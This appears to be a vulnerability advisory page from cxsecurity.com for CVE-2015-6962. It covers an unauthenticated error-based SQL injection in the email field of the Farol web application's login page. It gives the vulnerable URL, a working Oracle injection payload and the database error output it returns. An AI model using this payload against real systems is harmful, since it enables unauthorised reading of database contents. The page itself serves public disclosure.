Farol SQL Injection

2015.09.20
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: Web Application Farol with anauthenticated SQLi injection # Date: 2015-09-16 # Exploit Author: Thierry Fernandes Faria [ a.k.a SoiL ] [ thierryfariaa (at) gmail (dot) com ] # Vendor Homepage:http://www.teiko.com.br/pt/solucoes/infraestrutura-em-ti/farol # Version: [All] # CVE : CVE-2015-6962 # OWASP Top10: A1-Injection +---------------------+ + Product Description + +---------------------+ The FAROL web application is a software that monitors the databases +----------------------+ + Exploitation Details + +----------------------+ A vulnerability has been detected in the login page from web application FAROL . Sql injection anauthenticated. The e-mail field at login page is vulnerable. The e-mail field is vulnerable to Error Based Sql injection. Vulnerable Page: http://target/tkmonitor/estrutura/login/Login.actions.php?recuperar Vulnerable POST Parameter: email Usage:email'[SQLi error based]-- eg: email=1'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))-- ORA-20000: Oracle Text error: DRG-11701: thesaurus CORE 11.2.0.4.0 ProductionNLSRTL Version 11.2.0.4.0 - ProductionOracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit ProductionPL/SQL Release 11.2.0.4.0 - ProductionTNS for Linux: Version 11.2.0.4.0 - Production does not exist ORA-06512: at "CTXSYS.DRUE", line 160 +----------+ + Solution + +----------+ Upgrade the software


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top